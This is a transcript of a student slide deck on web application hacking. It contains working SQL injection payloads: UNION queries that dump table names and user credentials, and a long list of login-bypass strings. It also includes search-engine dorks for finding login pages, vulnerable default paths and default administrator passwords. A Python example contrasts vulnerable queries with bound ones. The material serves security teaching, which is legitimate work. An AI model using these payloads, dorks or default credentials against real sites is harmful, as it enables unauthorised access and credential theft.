
Are Secure ??? introduction

Date post: 12-Nov-2015
Upload: windu-gata
Description:
You have to know how they crack your web site. So You can make your website safe
Transcript

Are You Secure ?

Team:
Septema Umna Maulida (1312530247)
Ronny Tanjung (1311530263)
Wirawan Satyadi (1311530230)
Muhammad Fahmi (1312530148)
Fajar Agung Rizki (1311530404)
Bayu Laksono (1311530396)
Mai Gani Tamim (1311530107)
Rian Nurjaman (1311530123)
Husein Allmasyhur (1311530214)
Rudi Fredrick (0911530335)

Web Application Hacking

Typical Web Application set-up (diagram): the web client sends an HTTP request (cleartext or SSL) through the firewall to the web server (Apache, IIS, Netscape, etc.); the server hosts the web apps through plugins (Perl, C/C++, JSP, etc.), which talk to the SQL database over a database connection (ADO, ODBC, etc.); the HTTP reply carries HTML, JavaScript, VBScript, etc.

Utility of firewalls (diagram): hacks on OS network services such as Sun RPC, NT ipc$ and wu-ftpd are prevented by the firewall, because those ports are not exposed.

Firewalls cannot prevent (diagram, web client to web server): web server mis-configuration; URL interpretation attacks.

Firewalls cannot prevent (diagram, web client to web apps): poor checking of user inputs; URL interpretation attacks; input validation attacks.

Firewalls cannot prevent (diagram, web apps to database): input validation attacks that extend SQL statements; URL interpretation attacks; SQL query poisoning.

Firewalls cannot prevent (diagram, whole chain): reverse-engineering of HTTP cookies; input validation attacks; SQL query poisoning; URL interpretation attacks; HTTP session hijacking; impersonation. All of these travel inside ordinary HTTP traffic that the firewall is configured to allow.

URL Injection

Client side, URL: http://localhost/ronie/uas/index.php?status=detail&id=40

Server side (PHP):

// The untrusted GET parameter is interpolated straight into the SQL text,
// so any SQL syntax it carries becomes part of the query.
$ID = $_GET['id'];
$hasil = mysql_query("SELECT * FROM news WHERE ID = $ID order by id desc");

EXAMPLE URL INJECTION QUERIES

Syntax: union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--
To list the names of the tables in the database.

Syntax: union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
To list the fields of each table.

Syntax: union select all 1,group_concat(IDLogin,0x3a,Pass),3,4,5,6 from userweb--
To dump the records of the userweb table.

URL Injection, put together:

Client side, URL: http://localhost/ronie/uas/index.php?status=detail&id=40 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--

Server side, resulting query: SELECT * FROM news WHERE ID = 40 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()-- order by id desc

The trailing "--" comments out the application's own "order by id desc", so the injected UNION runs unchanged.

SQL Injection

Login flow (diagram): Web Login Page (Username: Bob, Password: MyPass123) -> Internet -> Apache server -> login_script2.php -> MySQL library -> MySQL server.

Query template in the application: Select * from User_Table where user=%user and pass=%pass

Normal login, query sent to MySQL: Select * from User_Table where user='Bob' and pass='MyPass123'

MySQL injection (diagram, same flow): the username field receives ' or 1=1-- instead of a name, so the template becomes:

Select * from User_Table where user='' or 1=1-- ' and pass=''

Everything after "--" is a comment, the password check disappears, and "or 1=1" makes the WHERE clause true for every row. The same works from the password field: Select * from User_Table where user=%user and pass='' or 1=1--

Login box

A common query:

SELECT * from table WHERE id=$id

We could inject some malicious query in this way:

http://www.host.com/file?id="malicious_code"
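As an added example (not part of the original slides), the id lookup from the URL Injection and Login box slides rebuilt in Python against an in-memory SQLite table standing in for the MySQL news table: the string-concatenated query from the slide beside a parameter-bound one and an allow-list check. The table, its rows and the function names are constructed for this example.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the slide's MySQL 'news' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(40, "public notice"), (41, "second notice"), (42, "third notice")],
    )
    return conn


def fetch_news_vulnerable(conn, raw_id):
    """Same shape as the slide: $_GET['id'] pasted into the SQL text, so any
    SQL syntax inside the value is parsed as part of the statement."""
    sql = f"SELECT id, title FROM news WHERE id = {raw_id} ORDER BY id DESC"
    return conn.execute(sql).fetchall()


def fetch_news_bound(conn, raw_id):
    """Parameter binding: the value travels separately from the SQL text, so
    whatever it contains is compared as data and never parsed as SQL."""
    sql = "SELECT id, title FROM news WHERE id = ? ORDER BY id DESC"
    return conn.execute(sql, (raw_id,)).fetchall()


def is_valid_id(raw_id):
    """Allow-list check: the page only ever expects a small positive integer."""
    return raw_id.isdigit() and len(raw_id) <= 9


def fetch_news_safe(conn, raw_id):
    """Defence in depth: reject anything that is not an integer, then bind."""
    if not is_valid_id(raw_id):
        raise ValueError("id must be a positive integer")
    return fetch_news_bound(conn, int(raw_id))


if __name__ == "__main__":
    db = make_db()
    payload = "40 OR 1=1"  # the slide's 'or 1=1' variation, appended to a valid id
    print("vulnerable:", fetch_news_vulnerable(db, payload))  # every row leaks
    print("bound:     ", fetch_news_bound(db, payload))       # no row matches
    print("validated: ", is_valid_id(payload))                # rejected up front
```

A log of requests whose id parameter fails is_valid_id is also a cheap detection signal for this class of probing.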

Search queries for finding login pages:
inurl:login.php
index of:/admin/login.php
index of login.php

Play with SQL Injection: injected query variations
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Directory Browsing

Application Default

Printer buffer overflow: http://www.zzzz.com/null.printer

FrontPage Server Extensions buffer overflow: http://www.zzzz.com/_vti_bin/_vti_aut/fp30reg.dll

Compaq Insight Manager (CIM): http://www.zzzz.com:2301 with default username:password pairs administrator:administrator, administrator:[Null], operator:operator

Statistics pages: /usage, /stat, /webstat, /wwwstats

Search Queries

THE END
